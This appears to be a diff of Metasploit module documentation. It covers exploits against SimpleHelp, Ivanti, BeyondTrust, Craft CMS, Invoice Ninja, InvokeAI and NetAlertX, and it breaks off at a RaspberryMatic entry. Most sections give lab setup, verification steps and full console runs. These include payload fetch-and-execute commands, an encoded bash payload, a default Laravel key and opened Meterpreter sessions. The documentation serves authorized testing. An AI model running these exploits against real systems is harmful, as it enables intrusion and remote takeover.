+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 219 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] exec: cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+```
@@ -0,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against Ivanti Connect Secure.
+It allows to attack both regular user and admin as well - you can select which type of account to attack with `ADMIN` parameter. 
+
+## Vulnerable Application
+
+- [Ivanti](https://www.ivanti.com/products/connect-secure-vpn)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/ivanti/login_scanner`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set ADMIN [attack admin?]`
+6. `run`
+
+
@@ -20,10 +20,12 @@ The issue mode. This controls what the module will do once an authenticated sess
 server. Must be one of the following options:

 * ALL: Enumerate all available certificate templates and then issue each of them
-* AUTO: Automatically select either the `User` or `Machine` template to issue based on if the authenticated user is a
-  user or machine account. The determination is based on checking for a `$` at the end of the name, which means that it
-  is a machine account.
-* QUERY_ONLY: Enumerate all available certificate templates but do not issue any
+* AUTO: Automatically select either the `User` or `DomainController` and `Machine` (`Computer`) templates to issue
+  based on if the authenticated user is a user or machine account. The determination is based on checking for a `$` 
+  at the end of the name, which means that it is a machine account.
+* QUERY_ONLY: Enumerate all available certificate templates but do not issue any.  Not all certificate templates
+  available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and 
+  include `Machine` (AKA `Computer`) and `DomainController`  
 * SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option

 ### CERT_TEMPLATE
@@ -0,0 +1,101 @@
+## Vulnerable Application
+This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
+Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
+product site. This exploit targets PRA and RS versions `24.3.1` and below.
+
+## Testing
+This exploit was tested against a vulnerable BeyondTrust Remote Support target running version `24.1.2`. To install
+a virtual appliance, follow [this documentation](https://docs.beyondtrust.com/rs/docs/va-install). You will first need
+to acquire the relevant software packages.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Options
+
+### TargetCompanyName
+If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
+By default, this is auto discovered.
+
+### TargetServerFQDN
+If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
+By default, this is auto discovered.
+
+### LeverageCVE_2024_12356
+By default, this exploit does not leverage the argument injection vulnerability CVE-2024-12356, and instead exploits the
+SQLi vulnerability CVE-2025-1094 directly. Enabling this option will cause this exploit to leverage CVE-2024-12356 during
+the exploitation of the SQLi vulnerability CVE-2025-1094. In either case the SQLi vulnerability CVE-2025-1094 is leveraged
+to achieve RCE.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > show options 
+
+Module options (exploit/linux/http/beyondtrust_pra_rs_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.105   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                       html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      usKuEPuSzgnx     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
+[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 24.1.2
+[*] Using company name: mytestcompany
+[*] Sending stage (3045380 bytes) to 192.168.86.105
+[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000
+
+meterpreter > getuid
+Server username: mytestcompany
+meterpreter > sysinfo
+Computer     : 192.168.86.105
+OS           : Gentoo 2.14 (Linux 6.1.76-bt)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,275 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in **Craft CMS**.
+
+The vulnerability lies in improper handling of Twig templates, which can be exploited
+to inject and execute arbitrary PHP code on the server via crafted HTTP requests.
+
+---
+
+### Affected Versions
+
+- **5.x Series**: `>= 5.0.0-RC1`, `< 5.5.2`
+- **4.x Series**: `>= 4.0.0-RC1`, `< 4.13.2`
+- **3.x Series**: `>= 3.0.0`, `< 3.9.14`
+
+---
+
+### Setting Up a Vulnerable Lab
+
+To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
+
+#### Docker Setup
+
+Install a specific vulnerable version of Craft CMS:
+
+```bash
+mkdir exploit-craft && \
+cd exploit-craft && \
+    # Configure DDEV (https://ddev.com/) project for Craft CMS \
+ddev config \
+  --project-type=craftcms \
+  --docroot=web \
+  --create-docroot \
+  --php-version="8.2" \
+  --database="mysql:8.0" \
+  --nodejs-version="20" && \
+    # Create the DDEV project
+ddev start -y && \
+    # Create Craft CMS with the specified version
+ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
+    # Install a vulnerable Craft CMS version
+ddev composer require "craftcms/cms:5.5.0" \
+  --no-scripts \
+  --no-interaction --with-all-dependencies && \
+    # Set the security key for Craft CMS
+ddev craft setup/security-key && \
+    # Install Craft CMS
+ddev craft install/craft \
+    --username=admin \
+    --password=password123 \
+    --email=admin@example.com \
+    --site-name=Testsite \
+    --language=en \
+    --site-url='$DDEV_PRIMARY_URL' && \
+    # Enable register_argc_argv for PHP
+mkdir -p .ddev/php/ && \
+echo "register_argc_argv = On" > .ddev/php/php.ini && \
+ddev restart && \
+    # Launch the project
+echo 'Setup complete. Launching the project.' && \
+ddev launch
+```
+
+---
+
+## Verification Steps
+
+1. Start the vulnerable Craft CMS instance using the steps above.
+2. Launch `msfconsole`.
+3. Use the module: `use exploit/linux/http/craftcms_ftp_template`.
+4. Set `RHOSTS` to the target Craft CMS instance.
+5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
+6. Execute the exploit with the `run` command.
+7. If successful, the module will execute the payload on the target.
+
+---
+
+## Options
+No option
+
+## Scenarios
+
+#### Successful Exploitation Against Craft CMS 5.5.0
+
+**Setup**:
+
+- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
+- Metasploit Framework.
+
+**Steps**:
+
+To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
+
+1. Start `msfconsole`:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/craftcms_ftp_template
+```
+
+3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
+```bash
+set RHOSTS exploit-craft.ddev.site
+```
+
+4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
+   - `RPORT` is set to `80`.
+   - `TARGETURI` is set to `/`.
+
+5. Set the payload for exploitation. For example:
+```bash
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+```
+
+6. Set the local listener address and port:
+```bash
+set LHOST 192.168.1.36
+set LPORT 4444
+```
+
+7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
+```bash
+set SRVPORT 9090
+set FETCH_SRVPORT 8081
+set FETCH_URIPATH /custom_payload_path
+```
+
+8. Run the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
+
+```bash
+msf6 exploit(linux/http/craftcms_ftp_template) > options
+
+Module options (exploit/linux/http/craftcms_ftp_template):
+
+   Name      Current Setting          Required  Description
+   ----      ---------------          --------  -----------
+   PASVPORT  0                        no        The local PASV data port to listen on (0 is random)
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    exploit-craft.ddev.site  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
+                                                oit.html
+   RPORT     80                       yes       The target port (TCP)
+   SRVHOST   192.168.1.36             yes       The local host or network interface to listen on. This must be an address on the local machine
+                                                 or 0.0.0.0 to listen on all addresses.
+   SRVPORT   9090                     yes       The local port to listen on.
+   SSL       false                    no        Negotiate SSL for incoming connections
+   SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      QnXFYebbb        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/craftcms_ftp_template) > exploit
+[*] Command to run on remote host: curl -so ./jlVAsfWu http://192.168.1.36:8081/LoPlnjEpeOexZNVppn6cAA;chmod +x ./jlVAsfWu;./jlVAsfWu&
+[*] Exploit running as background job 57.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/craftcms_ftp_template) >
+[*] Fetch handler listening on 192.168.1.36:8081
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Performing vulnerability check...
+[+] The target is vulnerable.
+[*] Starting FTP service...
+[*] Started service listener on 192.168.1.36:9090
+[*] FTP server started on 192.168.1.36:9090
+[*] Sending HTTP request to trigger the payload...
+[*] Triggering HTTP request...
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 250 "/default" is current directory.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 550 /default is not retrievable.
+[*] on_client_command_mdtm
+[*] -> 550 /default is not retrievable.
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_epsv
+[*] -> 502 EPSV command not implemented.
+[*] on_client_command_retr
+[*] -> 150 Opening data connection for /default/index.twig
+[*] -> 226 Transfer complete.
+[*] on_client_command_quit
+[*] -> 221 Goodbye.
+[*] Client 172.26.0.2 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.26.0.2 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.26.0.2
+[*] Meterpreter session 14 opened (192.168.1.36:4444 -> 172.26.0.2:59546) at 2025-01-10 17:07:39 +0100
+
+msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14
+[*] Starting interaction with 14...
+meterpreter > sysinfo
+Computer     : 172.26.0.2
+OS           : Debian 12.8 (Linux 5.15.0-130-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+[*] Waiting for FTP client connections...
+[*] Shutting down FTP service...
+[*] Server stopped.
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel.
+A Remote Code Execution vulnerability in Invoice Ninja (>= `5.8.22` <= `5.10.10`) allows remote unauthenticated
+attackers to conduct PHP deserialization attacks via endpoint `/route/<hash>` which accepts a Laravel
+ciphered value which is unsafe unserialized, if an attacker has access to the secret `APP_KEY`.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+to sensitive information.
+
+The following release was tested.
+* Invoice Ninja `5.10.10` on Ubuntu 22.04
+
+## Installation steps to install Invoice Ninja on a self-hosted platform
+`wget https://github.com/invoiceninja/dockerfiles/archive/refs/tags/5.8.22.zip`
+
+`unzip 5.8.22.zip`
+
+`cd dockerfiles-5.8.22`
+
+Replace inside `docker-compose.yml`
+
+FROM `image: invoiceninja/invoiceninja:5` TO `image: invoiceninja/invoiceninja:5.8.22`
+
+Replace in `env`
+`APP_KEY=base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`
+
+Then, execute `docker-compose up`
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/invoiceninja_uauth_rce_cve_2024_55555`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+### APP_KEY
+This option is required if the BRUTE_FORCE option is not used.
+It is the Laravel APP_KEY with a default key: `base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`.
+
+### BRUTEFORCE
+This option is optional and is a text file with a list of APP_KEYs, one per line for a bruteforce attack.
+
+## Scenarios
+### Invoice Ninja 5.10.10 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default Laravel APP_KEY preset in the option APP_KEY.
+```msf
+msf6 > use modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|6IWTnJv2f3lL1nbKRbl6LwJixPeRF5grQVTFTIuB
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60120) at 2025-02-23 09:47:28 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
+Meterpreter : php/linux
+meterpreter > pwd
+/usr/share/nginx/invoiceninja/public
+meterpreter >
+```
+###  Invoice Ninja 5.10.10 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the BRUTEFORCE option with a list of APP_KEYS in a text file.
+```msf
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set target 1
+target => 1
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set BRUTEFORCE /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+BRUTEFORCE => /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|3epElAO1qNeckBzHOytBrNnGrvRJSyeCBsahBkSO
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.6:60340) at 2025-02-23 09:49:15 +0000
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/usr/share/nginx/invoiceninja/public
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+InvokeAI has a critical vulnerability leading to remote code execution
+in the /api/v2/models/install API through unsafe model deserialization.
+The API allows users to specify a model URL, which is downloaded and loaded server-side using torch.load without proper validation.
+This functionality allows attackers to embed malicious code in model files that execute upon loading.
+
+The vulnerability affects:
+
+    * 4.0.0 <= InvokeAI <= 5.4.2
+
+This module was successfully tested on:
+
+    * InvokeAI 5.3.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+Follow the [official instructions](https://invoke-ai.github.io/InvokeAI/installation/manual/#walkthrough)
+
+1. Install uv:
+
+`curl -LsSf https://astral.sh/uv/install.sh | sh`
+
+2. Create a directory for your installation:
+
+```bash
+mkdir ~/invokeai
+cd ~/invokeai
+```
+
+3. Create a virtual environment in that directory:
+
+`uv venv --relocatable --prompt invoke --python 3.11 --python-preference only-managed .venv`
+
+4. Activate the virtual environment:
+
+`source .venv/bin/activate`
+
+5. Install the invokeai package:
+
+```bash
+uv pip install invokeai==5.3.1 --python 3.11 --python-preference only-managed --index=https://download.pytorch.org/whl/cpu --force-reinstall
+```
+
+6. Deactivate and reactivate your venv so that the invokeai-specific commands become available in the environment:
+
+`deactivate && source .venv/bin/activate`
+
+7. Edit ~/invokeai/invoke.yaml:
+
+```yaml
+  # Internal metadata - do not edit:
+  schema_version: 4.0.2
+  
+  # Put user settings here - see https://invoke-ai.github.io/InvokeAI/features/CONFIGURATION/:
+  host: 0.0.0.0 # serve the app on your local network
+```
+
+8. Run the application, specifying the directory you created earlier as the root directory:
+
+`invokeai-web --root ~/invokeai`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/invokeai_rce_cve_2024_12029`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/invokeai_rce_cve_2024_12029
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > options
+
+Module options (exploit/linux/http/invokeai_rce_cve_2024_12029):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    9090             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      CdRqUbPlDQJ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 5.3.1 detected.
+[*] Using URL: http://192.168.56.1:8081/Z8KmlibT
+[*] Server started.
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:48294) at 2025-02-16 15:24:41 +0900
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+An attacker can update NetAlertX settings with no authentication, which results in RCE.
+
+The vulnerability affects:
+
+    * v23.01.14 <= NetAlertX <= v24.9.12
+
+This module was successfully tested on:
+
+    * NetAlertX v24.9.12 installed with Docker on Ubuntu 22.04
+
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/netalertx_rce_cve_2024_46506`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+### WAIT (required)
+Wait time (seconds) for the payload to be set. Default is `75`.
+
+### CLEANUP
+Restore DBCLNP_CMD to original value after execution. Default is `true`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/netalertx_rce_cve_2024_46506
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > options
+
+Module options (exploit/linux/http/netalertx_rce_cve_2024_46506):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CLEANUP  true             no        Restore DBCLNP_CMD to original value after execution
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    20211            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+   WAIT     75               yes       Wait time (seconds) for the payload to be set
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      GXIuXvsu         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/netalertx_rce_cve_2024_46506) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 24.9.12 detected.
+[*] Sent request to update DBCLNP_CMD to '/bin/bash -c echo${IFS}Y3VybCAtc28gLi9QWHhyY3hFRCBodHRwOi8vMTkyLjE2OC41Ni4xOjgwODAvRy04Zjhua29IMGRUWkdQc052UzIzZztjaG1vZCAreCAuL1BYeHJjeEVEOy4vUFh4cmN4RUQmc2xlZXAgNztybSAtcmYgLi9QWHhyY3hFRA==|base64${IFS}-d|/bin/bash'.
+[*] Waiting settings really updated...
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:57510) at 2025-02-10 21:57:30 +0900
+[*] Added the payload to the queue. Waiting for the payload to run...
+[*] Sent request to update DBCLNP_CMD to 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           :  (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+RaspberryMatic / OCCU contains a unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within
+the Java based HMIPServer.jar component. The webui allows for Firmware uploads which can be reached through the URL
+`/pages/jpages/system/DeviceFirmware/addFirmware`.
+This allows an unauthenticated attacker to upload a malicious .tgz archive to the server, which will be automatically
+extracted without any further checks. As this entry can contain ../sequences, it is possible to break out of the predefined
+temp directory and write files to other locations outside this path.
+
+This vulnerability is commonly known as the Zip Slip vulnerability and can be used to overwrite arbitrary files on the main
